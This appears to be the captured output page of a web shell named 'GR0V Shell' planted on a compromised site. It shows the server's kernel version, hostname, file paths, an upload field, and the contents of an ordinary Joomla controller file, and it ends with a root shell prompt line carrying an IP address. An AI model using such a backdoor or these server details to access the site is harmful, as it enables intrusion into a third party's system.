? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/promice/components/com_download/
File Upload :
Current File : /home/admin/public_html/old/promice/components/com_download/controller.php

<?php
/**
 * @version		$Id: controller.php 10381 2008-06-01 03:35:53Z pasamio $
 * @package		Joomla

 */

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die( 'Restricted access' );

jimport('joomla.application.component.controller');

/**
 * @package		Joomla
 * @subpackage	download
 * @since 1.5
 */
class CategoriesController extends JController{
	/**
	 * @access	public
	 * @since	1.5
	 */
	function display(){
		// Set a default view if none exists
		if ( ! JRequest::getCmd( 'view' ) ) {
			JRequest::setVar('view', 'download' );
		}
		parent::display();
	}
}

T1KUS90T
  root-grov@210.1.60.28:~$